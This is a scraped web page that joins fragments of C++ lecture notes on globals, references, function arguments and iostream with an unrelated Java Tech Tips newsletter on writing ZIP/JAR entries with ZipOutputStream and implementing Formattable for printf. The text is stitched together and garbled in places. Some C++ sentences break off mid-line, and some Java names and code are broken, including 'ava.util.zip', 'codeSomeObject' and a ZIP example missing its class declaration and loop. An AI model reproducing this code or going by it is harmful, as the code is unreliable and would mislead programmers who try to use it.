::x = 7.0; // This refers to the global object.
}
What happens if we need to access the global object in another file? The object has already been defined in main_file.C, so we should not set aside new memory for it. We can inform the compiler of the existence of the global object using the extern keyword.
another_file.C
extern float x; // Declares the existence of a global object external to this file.
void do_something() {
x = 3; // Refers to the global object defined in main_file.C.
}
2. Reference Types
(Ref. Lippman 3.6)
Reference types are a convenient);
}
3. Functions in C++
Argument Passing
(Ref. Lippman 7.3)
Arguments can be passed to functions in two ways. These techniques are known as
Pass by value.
Pass by reference.
When an argument is passed by value, the function gets its own local copy of the object that was passed in. On the other hand, when an argument is passed by reference, the function simply refers to the object in the calling program.
// Pass by value.
void increment (int i) {
i++; // Modifies a local variable.
}
// Pass by reference.
void decrement (int& i) {
i--; // Modifies storage in the calling function.
}
#include <stdio.h>
int main () {
int k = 0;
increment(k); // This has no effect on k.
decrement(k); // This will modify k.
printf("%d\n", k);
}
Passing a large object by reference can improve efficiency since it avoids the overhead of creating an extra copy. However, it is important to understand the potentially undesirable side effects that can occur. If we want to protect against modifying objects in the calling program, we can pass the argument as a constant reference:
// Pass by reference.
void decrement (const int& i) {
i--; // This statement is now illegal.
}
Return by Reference
(Ref. Lippman 7.4)
A function may return a reference to an object, as long as the object is not local to the function. We may decide to return an object by reference for efficiency reasons (to avoid creating an extra copy). Returning by reference also allows us to have function calls that appear on the left hand side of an assignment statement. In the following contrived example, select_month() is used to pick out the month member of the object today and set its value to 9.
struct date {
int day;
int month;
int year;
};
int& select_month(struct date &d) {
return d.month;
}
#include <stdio.h>
int main() {
struct date today;
select_month(today) = 9; // This is equivalent to: today.month = 9;
printf("%d\n", today.month);
}
Default Arguments
(Ref. Lippman 7.3.5)
C++ allows us to specify default values for function arguments. Arguments with default values must all appear at the end of the argument list. In the following example, the third argument of move() has a default value of zero.
void move(int dx, int dy, int dz = 0) {
// Move some object in 3D space. If dz = 0, then move the object in 2D space.
}
int main() {
move(2, 3, 5);
move(2, 3); // dz assumes the default value, 0.
}
Function Overloading
(Ref. Lippman 9.1)
In C++, two functions can share the same name as long as their signatures are different. The signature of a function is another name for its parameter list. Function overloading is useful when two or more functionally similar tasks need to be implemented in different ways. For example:
void draw(double center, double radius) {
// Draw a circle.
}
void draw(int left, int top, int right, int bottom) {
// Draw a rectangle.
}
int main() {
draw(0, 5); // This will draw a circle.
draw(0, 4, 6, 8); // This will draw a rectangle.
}
Inline Functions
(Ref. Lippman 3.15, 7.6)
Every function call involves some overhead. If a small function has to be called a large number of times, the relative overhead can be high. In such instances, it makes sense to ask the compiler to expand the function inline. In the following example, we have used the inline keyword to make swap() an inline function.
inline void swap(int& a, int& b) {
int tmp = a;
a = b;
b = tmp;
}
#include <stdio.h>
main() {
int i = 2, j = 3;
swap(i, j);
printf("i = %d j = %d\n", i, j);
}
This code will be expanded as
main() {
int i = 2, j = 3;
int tmp = i;
i = j;
j = tmp;
printf("i = %d j = %d\n", i, j);
}
Whenever the compiler needs to expand a call to an inline function, it needs to know the function definition. For this reason, inline functions are usually placed in a header file that can be included where necessary. Note that the inline specification is only a recommendation to the compiler, which the compiler may choose to ignore. For example, a recursive function cannot be completely expanded inline.
4. Basic Input and Output
(Ref. Lippman 1.5)
C++ provides three predefined objects for basic input and output operations: cin, cout and cerr. All three objects can be accessed by including the header file iostream.h.
Reading from Standard Input: cin
cin is an object of type istream that allows us to read in a stream of data from standard input. It is functionally equivalent to the scanf() function in C. The following example shows how cin is used in conjunction with the >> operator. Note that the >> points towards the object into which we are reading data.
#include <iostream.h> // Provides access to cin and cout.
#include <stdio.h> /* Provides access to printf and scanf. */
int main() {
int i;
cin >> i; // Uses the stream input object, cin, to read data into i.
scanf("%d", &i); /* Equivalent C-style statement. */
float a;
cin >> i >> a; // Reads multiple values from standard input.
scanf("%d%f", &i, &a); /* Equivalent C-style statement. */
}
Writing to Standard Output: cout
cout is an object of type ostream that allows us to write out a stream of data to standard output. It is functionally equivalent to the printf() function in C. The following example shows how cout is used in conjunction with the << operator. Note that the << points away from the object from which we are writing out data.
#include <iostream.h> // Provides access to cin and cout.
#include <stdio.h> /* Provides access to printf and scanf. */
int main() {
cout << "Hello World!\n"; // Uses the stream output object, cout, to print out a string.
printf("Hello World!\n"); /* Equivalent C-style statement. */
int i = 7;
cout << "i = " << i << endl; // Sends multiple objects to standard output.
printf("i = %d\n", i); /* Equivalent C-style statement. */
}
Writing to Standard Error: cerr
cerr is also an object of type ostream. It is provided for the purpose of writing out warning and error messages to standard error. The usage of cerr is identical to that of cout. Why then should we bother with cerr? The reason is that it makes it easier to filter out warning and error messages from real data. For example, suppose that we compile the following program into an executable named foo:
#include <iostream.h>
int main() {
int i = 7;
cout << i << endl; // This is real data.
cerr << "A warning message" << endl; // This is a warning.
}
We could separate the data from the warning by redirecting the standard output to a file, while allowing the standard error to be printed on our console.
athena% foo > temp
A warning message
athena% cat temp
7
5..
point.h
// Declaration of class Point.
#ifndef _POINT_H_
#define _POINT_H_
#include <iostream.h>
class Point {
// The state of a Point object. Property variables are typically
// set up as private data members, which are read from and
// written to via public access methods.
private:
float mfX;
float mfY;
//"
void main() {
Point a;
Point b(1.0, 2.0);
Point c(b);
// Print out the current state of all objects.
a.print();
b.print();
c.print();
b.set_x(3.0);
b.set_y(4.0);
// Print out the current state of b.
cout << endl;
b.print();
} | http://ocw.mit.edu/courses/civil-and-environmental-engineering/1-124j-foundations-of-software-engineering-fall-2000/lecture-notes/object-_construction_and_destruction/ | crawl-003 | refinedweb | 1,461 | 67.35 |
Configuration macros for platform, compiler, etc. More...
Configuration macros for platform, compiler, etc.
#include <mi/base/base.h>
The operating system specific default filename extension for shared libraries (DLLs)
Creates an identifier from concatenating the values of
X and
Y, possibly expanding macros in
X and
Y.
Creates a string from the value of
X, possibly expanding macros in
X.
This macro is defined if the compiler supports rvalue references.
The compiler-specific, strong
inline keyword.
The C++ language keyword
inline is a recommendation to the compiler. Whether an inline function is actually inlined or not depends on the optimizer. In some cases, the developer knows better than the optimizer. This is why many compilers offer a separate, stronger inline statement. This define gives portable access to the compiler-specific keyword.
Pre-define
MI_FORCE_INLINE to override the setting in this file.
Empty macro that can be used after function names to prevent macro expansion that happen to have the same name, for example,
min or
max functions. | https://raytracing-docs.nvidia.com/iray/api_reference/iray/html/group__mi__base__config.html | CC-MAIN-2019-22 | refinedweb | 167 | 50.43 |
Revision as of 21:00, 22 August 2017
Contents
DRAFT
Review Purpose
In order for a new Module to be added to Fedora, the module must first undertake a formal review much like the RPM Package Review process. The purpose of this formal review is to try to ensure that the module meets the quality control requirements for Fedora.
Reviews are currently done for totally new modules and every time a new module stream is created (technically, proposed to be created).
Modules are not required to share a 1:1 relationship with RPM Packages but can instead deliver multiple RPM Packages (such as dependencies) in order to distribute a fully functional module. However naming of the module should be based on the main service or software it aims to deliver.
Testing Modules
For both contributors and reviewers, the COPR infrastructure can and should be used for creating and testing modules in advance of building them formally. For any long-standing Fedora Packager, this is taking the place of "Koji scratch builds" for Modules. Why? Because modules are much trickier to track through Koji and scratch builds in Koji & MBS will be a challenging implementation. As a result, it has been deferred, perhaps indefinitely, if COPR can fill the role as well or better.
NOTE: The COPR infrastructure has not deployed the changes required for creating and building modules yet. Currently, blocked on some of the base modules being built. For now, please use
mbs-build local as described in the docs
Review Process
There are two roles in the review process, that of the contributor and that of the reviewer. In this document, we'll present both perspectives.
Contributor
A Contributor is defined as someone who wants to submit (and maintain) a new Module in Fedora. To become a contributor, you must follow the detailed instructions to Join the package collection maintainers.
As a Contributor, you must only be creating modules out of pre-existing software in the Fedora RPM repositories which adheres to the Package Naming Guidelines and Packaging Guidelines. Make note that the only software allowed in official Fedora Modules must be sourced from Fedora official RPMs. The Module Build Service will reject attempts to build from sources not provided by Fedora's dist-git.
Module Metadata Files
- Put your Module Metadata (modulemd) file.
- Ensure your modulemd file meets the specifications outlined in the Module Guidelines
- Fill out a request for review in bugzilla (FIX ME). For guidance, a screenshot of a sample bugzilla request is available for review FIX ME.
- If you do not have any package, container layered image, or module modulemd file! At this point in the process, the fedora-review flag is blank, meaning that no reviewer is assigned.
- There may be comments from people that are not formally reviewing the module, they may add NotReady to the Whiteboard field, indication that the review request is not yet ready, because of some issues they report. After you have addressed them, please post the URLs to the updated modulemd file modulemd. You should fix any blockers that the reviewer identifies. Once the reviewer is happy with the package, the fedora-review flag will be set to +, indicating that the package has passed review.
- At this point, you need to make an SCM admin request for your newly approved Module! If you have not yet been sponsored, you will not be able to progress past this point. (You will need to make sure to request the
modulenamespace in PackageDB)
- Checkout the package using "fedpkg clone module/<module-name>" and do a final check of your files.
- When this is complete, you can add relevant module files into the SCM.
- Request a build by running "mbs-build submit" from the directory you cloned into.
- You should make sure the review ticket is closed. You are welcome to close it once the module has been built. If you close the ticket yourself, use NEXTRELEASE as the resolution.
You do not need to go through the review process again for subsequent module changes for this module stream..)
Module Metadata File
- Module Metadata (modulemd) file, set the fedora-review flag to ? and assign the bug to yourself.
- Review the module ...
- Go through the MUST items listed in Module Guidelines.
- Go through the SHOULD items in Module Guidelines.
- Include the text of your review in a comment in the ticket. For easy readability, simply use a regular comment instead of an attachment.
- Take one of the following actions:
- ACCEPT - If the module is good, set the fedora-review flag to +
- FAIL, LEGAL - If the module is legally risky for whatever reason (known patent or copyright infringement, trademark concerns) close the bug WONTFIX and leave an appropriate comment (e.g. linking to the corresponding entry on the Forbidden_items page). Set the fedora-review flag to -, and have the review ticket block FE-Legal.
- FAIL, OTHER - If the module is just way off or unsuitable for some other reason, and there is no simple fix, then close the bug WONTFIX and leave an appropriate comment (e.g. packaging and gift wrap are not the same thing, sorry. Or, this isn't a modulemd,. (Note: The Package nomenclature is carried over here and you will want to filter for "Module Review")
The "Trivial" status is intended to indicate Modules which, as an aid to new reviewers, are especially uncomplicated and easy to review. A ticket should not be marked as being trivial unless:
- The Module is known to build and a link to a COPR build is included.
- The ticket explains any yamllint output which is present.
- The Module contains no daemons.
- The Module is not especially security sensitive.
- The code has undergone a thorough inspection for licensing issues. Anomalies which would be found by licensecheck should be explained.
In short, this should be reserved only for those tickets which should be easily approachable by someone doing their first Module review.
Tracking of Module Requests
The cached Package Review Tracker provides various review-related reports and a simple way to search for reviews by package name or reporter name or others. (Note: The Package nomenclature is carried over here and you will want to filter for "Module Review") | https://www.fedoraproject.org/w/index.php?title=Module:Review_Process&diff=prev&oldid=500192 | CC-MAIN-2021-31 | refinedweb | 1,034 | 62.48 |
This.
Among other things, the new HTML designer provides:
Below is a screen-shot
Presumably Microsoft is shipping an ultra-high resolution monitor with each copy of Orcas then? You have a *lot* of panels open in that screenshot!
Good improvements though. This will encourage people to use the HTML view in tandem with the designer so that they can be more aware of what code changes their actions are action making.
Great news Scott. I can't wait to start using this new editor.
One thing i keep waiting for is proper multi-monitor support in Visual Studio though. That split view could work incredibly well with two monitors if it was supported. Source View of the page on one screen and WYSIWIG view on the other. Are you aware if any work regarding multi-monitor support has taken place with Visual Studio?
A man can dream.... :)
thats a great news :)
I only wish for full IntelliSence support...
Does Orcas finally provide IntelliSense in the databinding expressions?
The two features that would greatly help databinding to Objects (linq objects or custom objects) in ASP.Net from a designer perspective are IntelliSense (no more of this generic Eval/Bind thing....lets have strong typing and being able to traverse an object model in a binding expression (which is easier with intellisense and strong typed items.
Essentially, rather than having to do ((MyType)Container.DataItem).MyProperty.SomethingElse -- or a sub-datasource as ((Order)Container.DataItem).Details -- the items should already be strongly typed. And with intellisense support, it's even easier.
--Oren
I suppose the new designer is sharing some code with the Expression Web Designer, am I right? I like very much EWD and having it integrated into VS would be great!
Hi Scott ... great news !!!
Any idea when this new editor will be available (for betatesters) in any CTP or Beta ??
Thanks in advance
Bye from Spain
This is incredible. I am especially happy to see an integration between expression & VS. Now it'd be nice if SharePoint Designer did the same, but hey.
So this isn't a part of the Jan CTP right? This'll be a part of the next Orcas CTP.
I am super excited that Orcas is finally beginning to take shape.
SM
Scott,
This is great stuff but is there anything being done to improve build speeds of asp.net projects. I realize that both aspx and code behind are being built when using Web Site Projects in a "Full rebuild" scenario.
Still, VS 2005/7 should be smart enough to see files that have not been changed and try NOT to build them - if they have been built already. In addition, maybe, this should be extended to Web deployment projects too.
Yes, I have already read your tips on this ;-)
Thanks,
Raj
I heard the other day a new update from a refactoring tool (don't remember the name) that mentions new asp.net css related refactoring simple but sounds useful, does Orcas will have CSS or asp.net related refactoring?
Thanks
I'm with Stebet on the multi-monitor support. It would be great if the Code and Design windows could be split from their usual stacked above/below configuration. For instance, with the code on one monitor and the design on another.
And just better multi-monitor support overall. It seems most developers now use at least two monitors.
It's nice to see the Web Expression style stuff in Orcas. I had a look at Expression and was suitably impressed. I may even give up Topstyle one of these days.
Marcos
Once these improvements are available in a final release, I'm going to have problems coming-up with a reason to keep Dreamweaver around ;)
With all of the advancements is there any possibility of seeing something like this in "Orcas". The concept as allowing for xmlns style names for attributes on a control in the HTML view for extenders.
After working on the Ajax Control Toolkit for awhile we're producing a lot of extenders for use in ASP.NET development. Something like the above could make it easier to associate a control with its extended behavior.
Wow! Split-view is a great feature! Adding the ability to detach either the HTML edit window or the designer window from the main window would be awesome for those in a mult-monitor environment!
I have a few questions:
1. I played with Expression Web today, and I was amazed (in a negative way) to see the JavaScript that it outputs for some 'dynamic' buttons. Also shocking was the use of comments in the source to add behavior to the designer. Please tell me we will not start seeing this in Visual Studio!
2. I have been using Firebug a lot, an add on for Firefox. It allows me to alter the source for a web page with a real time preview IN THE ACTUAL BROWSER. Nothing can beat that kind of preview right? So is that how the new designer works?
Thanks!
WOW!!!! I can't wait to get my hands on that split screen mode.
I agree with Ron, having Intellisense and XHTML validation support for properties implemented as child controls would fill in the last missing gap.
I recently stumbled into this when I posted about the issue in the asp.net Visual Studio forums. (I had not run into this issue until recently.)
Currently the only way to get validation and Intellisense is to nest server controls instead of child control properties. I would like to develop my controls and use child control properties ala GridView.
Congrats to the team on moving things forward with web design.
I would like to remind the team not to lose sight of the work being done on Sharepoint Designer, Expression Web, and even Windows Live Writer. It would be a shame to see divergence on core bits such as the HTML editor and various tools that could be shared across the applications. Did you know that Windows Live Writer doesn't emit proper XHTML? It sounds crazy because we see so much advancement in web standards in other Microsoft tools (I know it's a free tool, but you're in the same eco-system where you should be able to access each others developments). Keeping the core in sync will makes for great collaboration when your web designers and developers share similar (but different enough to be tailored to their needs) environments.
>>Designer support for nested master pages
Thank You.
Michael
All of this sounds nice. Not taking anything away from the people who invested their passion nor from Microsoft who has invested the resources, but these design views are easily accommodated using Firefox and a few plug-ins, both commercial and free, a good style sheet editor and running the in-development process via localhost while using other assorted browsers/user agents simultaneously to check performance and rendering.
The improved Intellisense functionality sounds tremendous.
I hope to hell that 1% of identical resources have been invested into Orcas to produce true compliant control adapters and not advertised "pseudo" compliant control adapters, either internal or add-on. ASP.NET could be the best platform out there, now and years to come. That means meeting the basics out of the shoot -- tab order, shortcut keys, captions, true device independence, etc., -- with the flexibility for the developer/designer to utilize and assign such based upon the demographics of the project, e.g., being able to assign tab index and access key values directly into the database or XML file for the datagrid and menu adapters.
When this animal comes out of the shoot again, I hope to hell that it is the big mean ass bull that it is being promoted as being and not some old Jersey cow with a new shiny bell around her neck.
There are two things I'd like Orcas to improve concerning working with Skin files. First I’d like to have IntelliSense in skin files and second the possibility to have code blocks like with aspx files with data binding. Something like: <%# Eval("Name").ToString().Replace("red", "green") %>.
Thanks for another great post! I'm excited for this next phase of visual studio's evolution.
Awesome! Same engine as Expression right so it's not based on MSHTML and thus works faster? I've been using Expression for a while now and love it, except for it's lack of decent ASP.NET support.
How about the JavaScript tools in the Orcas build?
I am glad you guys are working on a better CSS-oriented editor but I have to agree with earlier comments that this looks really cluttered and very unintuitive.
I use the Firebug extension to Firefox for all my editing now. It's ability to view the inheritance tree and tweak CSS settings in real time are better than anything else I have seen. I would love to see something like that in VS.
Hi Scott... That sounds awesome! Can't wait for you guys to release orcas! Hurry up! :)
Btw, are there any features "missing" in the new designer? I don't have any specific feature in mind, but is the new designer missing any features compared to the old one?
Keep up your awesome work!
Will AJAX be built in into Orcas?
Peace in Christ
Marco Napoli
Now that is just mean. ;) It is so hard to wait for features like this.
hi Scott,
The changes in the desiner has been very good as compared to earlier releases of VS 2003. But there was a minor issue.While using the web site administration tool for editing web.config files the intellisence used to get disabled due to namespace addition. Has this problem been taken care off in this new realease?
Regards,
Nilesh
For people who are talking about multiple monitor support, I use two monitors at work, with VS 2005. I have all my code (and only the code) in my left-hand monitor (oriented portrait, for more code-on-screen).
All my panels are undocked and on my right-hand monitor (still oriented landscape). So I get all the benefits of having the two monitors, without having toolbars and code split awkwardly across the join.
Worth trying. A photo of my screens (conveniently with Visual Studio having focus) is on Flickr, at if that helps explain it any.
This is all good - I really didn't want to depend upon Expression to do my programming work after spending the $$$ on VS
It makes we wonder what you are working on right now, since you started this work in 2004!
orcas is the visual studio that I've sought after for years now! having started with dreamweaver I hated the lack of real design support in VS...
but it's 2007 and designer support is becoming more prevalent in your products. YIPEE!
I'm glad that the orcas team has added elements that dreamweaver has had for about a decade. Good stuff, keep it up.
Im loving these improvements to the html editor and wysiwyg designer. They are definitely some of the worst pieces of VS. Cant wait for the release. Cheers
To get a jump on the interface, a new site just popped up called LearnExpression.com. It's from the same group that built LearnVisualStudio.Net.
I do agree with the earlier posting about multiple monitor support. Even Bill has 3 monitors on his desk!
Visual Studio Visual Web Designer and HTML Editor has been the worst pieces of VS, I am happy to hear this big improvement and I can't wait to see that in action.
thanks.
I'm really happy to hear that this will integrate into VS. I'm not too crazy about the existing web designer. And since I have yet to catch up on Expressions but feel right at home in VS2005, makes things that much easier...
Will there be a WPF/E designer in Visual Studio "Orcas"?
You write "...I'm planning to record some videos..."
Since I just yesterday digged into Screencasting (and found a good free tool), I would like to hear what kind of tools you/Microsoft do use to make screencasts.
Hi Uwe,
We typically use "Camtasia" to record videos. I've found it pretty easy to use and it seems to work really well.
Hope this helps,
I'm surprised you don't use Windows Media Encoder to record your screen captures.
Will the new designer resolve "~/css/1.css" paths correctly? Expression Web wouldn't recognize external css or script files that used tilde notation. Images worked as long as <asp:Image was used (I think..), although paths in html elements with runat=server set failed.
For the present (with VS2005), how can I reference an external CSS file without breaking design-time support? URL rewriting requires that ~/ paths are used.
I am using Themes whenever possible to make this a non-issue, but there are places where it is necessary. Also, for some reason, design-time support breaks if I use 'Theme=' instead of 'Stylesheet=".
Nathanael Jones
Two monitors side by side? What a headache. Try a slick 22" widescreen LCD - works like a dream for me.
Who can help me with .httpaccess ?
where i can fined full information about .httpaccess file syntaxis?
Good to see new Imporovment of IDE.Great people Great work.
I don't know if Orcas has this or not, but here's something I think would have a HUGE impact on how asp.net apps are written. Let's say I have this:
<table style="width:100%" class="table_css">
<tr>
<td class="header_css">
<asp:Literal runat... />
</td>
<td align="right">
<asp:Button runat ... />
</tr>
</table>
A lot of times I find myself using the same piece of code on many pages. If I decide to change the css for the table I would have to hunt down this piece of code in all my aspx pages.
A solution for this is to build a custom templated control. But, needless to say it's cumbersome and unless the code is reusable in other projects it would probably not make sense to invest the time. Plus, having a custom control forces you to mix HTML code with CS or VB.
The ideal "solution" (IMO) would be to have this built-in as a functionality of the User Control. It's already there, but the current implementation is rather a hack (i.e. you still have to do "a lot" of coding in the ascx's code behind) and doesn't have any design-time support (pretty much breaks the page). Anyway, here's what I think would be cool:
In ASCX:
<table style="width:100%">
<td class="header">
<* Template Name="Title" *>
<* Template Name="Button" *>
And in the ASPX
<uc1:MyControl runat... >
<Title>Some tile</Title>
<Button><asp:Button runat.../></Button>
</uc1:MyControl>
I've use the <* *> syntax just to emphasize that it could be anything. The same principle used in Master Pages could be used. What I would need is to be able to select the control (the ASP Button inside Button tag) and change its properties (much like the MultiView works). Quite frankly I only use the design mode to be able to easily assign event handlers. Also, I need to be able to reference the Button defined inside the Button tag as if it was declared outside of the user control.
The idea is to have a way to centralize ALL the repetitive HTML code!
I really hope you guys already have something like this planned.
Pingback from RED 91 - The new Visual Studio
Over the last week or so our team has been planning what we will be working on over the next 12 months. | http://weblogs.asp.net/scottgu/archive/2007/01/22/visual-studio-orcas-web-designer-integrated-into-main.aspx | crawl-001 | refinedweb | 2,639 | 73.68 |
/* ** (c) COPYRIGHT MIT 1995. ** Please first read the full copyright statement in the file COPYRIGH. */Descriptions appearing in directory listings are produced by this module. This may be overridden by another module for those who which descriptions to come from somewhere else. It's only HTTP directory listings that contain a description field (if enabled by the Directory browsing module.
This module is implemented by HTDescpt.c, and it is a part of the W3C Sample Code Library.
#ifndef HTDESCRIPT_H #define HTDESCRIPT_H
HTDescriptionFilein the same directory as the directoy to be listed. The default value is
.www_descript:
extern char * HTDescriptionFile;In the description file lines starting with a word starting with 'D' are taken to be descriptions (this looks funny now, but this is to make it easy to extend these description files to contain also other information. An example of the format of the description file is:
/* ** DESCRIBE welcome.html Our welcome page ** DESCRIBE map*.gif Map as a GIF image ** DESCRIBE map*.ps Map as a PostScript image */
text/html, this module uses the HTML TITLE as the description. This feature can be turned off by setting the
HTPeekTitlesvariable to false.
extern BOOL HTPeekTitles;
HTReadDescriptions(), and the result returned by it is given as an argument when finding out a description for a single file.
extern HTList * HTReadDescriptions (char * dirname);
HTReadDescriptions(), the function
HTGetDescription()can be used to get a description for a given file:
extern char * HTGetDescription (HTList * descriptions, char * dirname, char * filename, HTFormat format);Directory name has to be present because this function may then take a peek at the file itself (to get the HTML TITLE, for example). If
formatis
WWW_HTMLand description is not found, this module may be configured to use the HTML TITLE as the description.
No string returned by this function should be freed!
HTReadDescriptions()must be freed by
HTFreeDescriptions():
extern void HTFreeDescriptions (HTList * descriptions);
#endif /* !HTDESCRIPT_H */ | http://www.w3.org/Library/src/HTDescpt.html | CC-MAIN-2013-48 | refinedweb | 315 | 55.95 |
Welcome to the Core Java Technologies Tech Tips for May 2007. Core Java
Technologies Tech Tips provides tips and hints for using core Java technologies
and APIs in the Java Platform, Standard Edition 6 (Java SE 6).
In this issue provides tips for the following:
» Controlling the Creation of ZIP/JAR Entries
» Using printf with Custom Classes
printf
These tips were developed using Java SE 6. You can download Java SE 6 from the Java SE Downloads page.
The author of this month's tips is John Zukowski, president and principal consultant of JZ Ventures, Inc..
A handful of earlier tips have explored JAR files:
Previous tech tips have described listing, reading, and updating archived content,
but not much has been said about how to create JAR or ZIP archives. Because the
JAR-related classes are subclasses of the ZIP-related classes, this tip is more
specifically about the ZipOutputStream and the java.util.zip package.
ZipOutputStream
java.util.zip
Before digging into creating ZIP or JAR files, it is important to mention
their purpose., and compressing those added files.
First up is creating zip files, or more specifically zip streams. The
ZipOutputStream offers a stream for compressing the outgoing bytes. There is a
single constructor for ZipOutputStream, one that accepts another OutputStream:
OutputStream
public ZipOutputStream(OutputStream out)
If the constructor argument is the type FileOutputStream, then
the compressed bytes written by the Zip:
FileOutputStream
String path = "afile.zip";
FileOutputStream fos = new FileOutputStream(path);
ZipOutputStream zos = new ZipOutputStream(fos);.
ZipEntry ZipFile to produce a list in alphabetical or size
order, but the entries are still stored in the order they were written to the
output stream.
entries()
ZipFile.
setMethod ava.util.zip package. You cannot just pass
in 0 or -1 to ignore the checksum value; the CRC value will
be used to validate your input when creating the ZIP and when reading from it
later.
CRC32
ava.util.zip
checksum
entry.setMethod(ZipEntry.STORED);
entry.setCompressedSize(file.length());
entry.setSize(file.length());
CRC32 crc = new CRC32();
crc.update(<< all the bytes for entry >>);
entry.setCrc(crc.getValue());(
ZipEntry entry = new ZipEntry(name);
entry.setMethod(ZipEntry.STORED);
entry.setCompressedSize(file.length());
entry.setSize(file.length());
entry.setCrc(crc.getValue());
zos.putNextEntry(entry);
zos.write(buffer, 0, bytesRead);
zos.close();
}
}
For more information on JAR files, including how to seal and
version them, be sure to visit the Packing Programs in JAR Files
lesson in The Java Tutorial.
Java SE 1.5 added the ability to format output using formatting strings like
"%5.2f%n" to print a floating point number and a newline. An October 2004 tip
titled Formatting Output with the New Formatter described this.
The Formattable interface is an important feature but wasn't part of the
earlier tip. This interface is in the java.util package. When your class
implements the Formattable interface, the Formatter class can use it to
customize output formatting. You are no longer limited to what is printed by
toString() for your class. By implementing the formatTo() method of
Formattable, you can have your custom classes limit their output to a set width
or precision, left or right justify the content, and even offer different
output for different locales, just like the support for the predefined system
data types.
toString()
formatTo()
The single formatTo() method of Formattable takes four arguments:
public void formatTo(Formatter formatter, int flags, int width, int precision)
The formatter argument represents the Formatter from which to get the locale and
send the output when done.
The flags parameter is a bitmask of the FormattableFlags set. The user can have
a - flag to specify left justified (LEFT_JUSTIFY), ^ flag for locale-sensitive
uppercase (UPPERCASE), and # for using the alternate (ALTERNATE) formatting.
FormattableFlags
^
#
A width parameter represents the minimum output width, using spaces to fill the
output if the displayed value is too short. The width value -1 means no
minimum. If output is too short, output will be left justified if the flag is
set. Otherwise, it is right justified.
A precision parameter specifies the maximum number of characters to output. If
the output string is "1234567890" with a precision of 5 and a width of 10, the
first five characters will be displayed, with the remaining five positions
filled with spaces, defining a string of width 10. Having a precision of -1
means there is no limit.
A width or precision of -1 means no value was specified in the formatting
string for that setting.
When creating a class to be used with printf and Formatter, you never call the
formatTo() method yourself. Instead, you just implement the interface. Then,
when your class is used with printf, the Formatter will call formatTo() for
your class to find out how to display its value. To demonstrate, let us create
some object that has both a short and long name that implements Formattable.
Here's what the start of the class definition looks like. The class has only
two properties, an empty implementation of Formattable, and its toString()
method.
import java.util.Formattable;
import java.util.Formatter;
public class SomeObject implements Formattable {
private String shortName;
private String longName;
public SomeObject(String shortName, String longName) {
this.shortName = shortName;
this.longName = longName;
public String getShortName() {
return shortName;
public void setShortName(String shortName) {
public String getLongName() {
return longName;
public void setLongName(String longName) {
public void formatTo(Formatter formatter, int flags,
int width, int precision) {
public String toString() {
return longName + " [" + shortName + "]";
As it is now, printing the object with println() will display the long name,
followed by the short name within square brackets as defined in the toString()
method. Using the Formattable interface, you can improve the output. A better
output will use the current property values and formattable flags. For this
example, formatTo() will support the ALTERNATE and LEFT_JUSTIFY flags of
FormattableFlags.
println()
The first thing to do in formatTo() is to find out what to output. For
SomeObject, the long name will be the default to display, and the short name
will be used if the precision is less than 7 or if the ALTERNATE flag is set.
Checking whether the ALTERNATE flag is set requires a typical bitwise flag
check. Be careful with the -1 value for precision because that value means no
limit. Check the range for the latter case. Then, pick the starting string
based upon the settings.
SomeObject
String name = longName;
boolean alternate =
(flags & FormattableFlags.ALTERNATE) == FormattableFlags.ALTERNATE;
alternate |= (precision >= 0 && precision < 7);
String out = (alternate ? shortName : name);
Once you have the starting string, you get to shorten it down if necessary,
based on the precision passed in. If the precision is unlimited or the string
fits, just use that for the output. If it doesn't fit, then you need to trim
it down. Typically, if something doesn't fit, the last character is replaced by
a *, which is done here.
StringBuilder sb = new StringBuilder();
if (precision == -1 || out.length() <= precision) {
sb.append(out);
} else {
sb.append(out.substring(0, precision - 1)).append('*');
To demonstrate how to access the locale setting, the example here will
reverse the output string for Chinese. More typically a translated starting
string will be used based on the locale. For numeric output, the locale defines
how decimals and commas appear within numbers.
if (formatter.locale().equals(Locale.CHINESE)) {
sb.reverse();
Now that the output string is within a StringBuilder buffer, you can fill up
the output buffer based upon the desired width and justification setting. For
each position available within the desired width, add a space to beginning or
end based upon the justification formattable flag.
StringBuilder
int len = sb.length();
if (len < width) {
boolean leftJustified = (flags & FormattableFlags.LEFT_JUSTIFY)
== FormattableFlags.LEFT_JUSTIFY;
for (int i = 0; i < width - len; i++) {
if (leftJustified) {
sb.append(' ');
} else {
sb.insert(0, ' ');
The last thing to do is to send the output buffer to the Formatter. That's done
by sending the whole String to the format() method of formatter:
format()
formatter.format(sb.toString());
Add in some test cases, and that gives you the whole class definition, shown
here:
import java.util.FormattableFlags;
import java.util.Locale;
int width, int precision) {
StringBuilder sb = new StringBuilder();
String name = longName;
boolean alternate = (flags & FormattableFlags.ALTERNATE)
== FormattableFlags.ALTERNATE;
alternate |= (precision >= 0 && precision < 7); //
String out = (alternate ? shortName : name);
// Setup output string length based on precision
if (precision == -1 || out.length() <= precision) {
sb.append(out);
sb.append(out.substring(0, precision - 1)).append('*');
if (formatter.locale().equals(Locale.CHINESE)) {
sb.reverse();
// Setup output justification
int len = sb.length();
if (len < width) {
boolean leftJustified =
(flags & FormattableFlags.LEFT_JUSTIFY) ==
FormattableFlags.LEFT_JUSTIFY;
for (int i = 0; i < width - len; i++) {
if (leftJustified) {
sb.append(' ');
} else {
sb.insert(0, ' ');
}
formatter.format(sb.toString());
public static void main(String args[]) {
SomeObject obj = new SomeObject("Short", "Somewhat longer name");
System.out.printf(">%s<%n", obj);
System.out.println(obj); // Regular obj.toString() call
System.out.printf(">%#s<%n", obj);
System.out.printf(">%.5s<%n", obj);
System.out.printf(">%.8s<%n", obj);
System.out.printf(">%-25s<%n", obj);
System.out.printf(">%15.10s<%n", obj);
System.out.printf(Locale.CHINESE, ">%15.10s<%n", obj);
Running this program produces the following output:
>Somewhat longer name<
Somewhat longer name [Short]
>Short<
>Somewha*<
>Somewhat longer name <
> Somewhat *<
> * tahwemoS<
The test program creates a codeSomeObject with a short name of "Short" and a long
name of "Somewhat longer name". The first line here prints out the object's
long name with the %s setting. The second outputs the object via the more
typical toString(). The third line uses the alternate form. The next line
doesn't explicitly ask for the alternate short form, but because the precision
is so small, displays it anyways. Next, a precision is specified that is long
enough to not use the alternate format, but too short to display the whole long
name. Thus, a "*" shows more characters are available. Next the longer name is
displayed left justified. The final two show what happens when the width is
wider than the precision, with one also showing the reversed "Chinese" version
of the string.
codeSomeObject
That really is all there is to make your own classes work with printf. Whenever
you want to display them, be sure to use a properly configured %s setting
within the formatting string.
If you still have questions about using printf, be sure to visit the earlier
tip mentioned at the start of this tip, titled Formatting Output with the New Formatter.
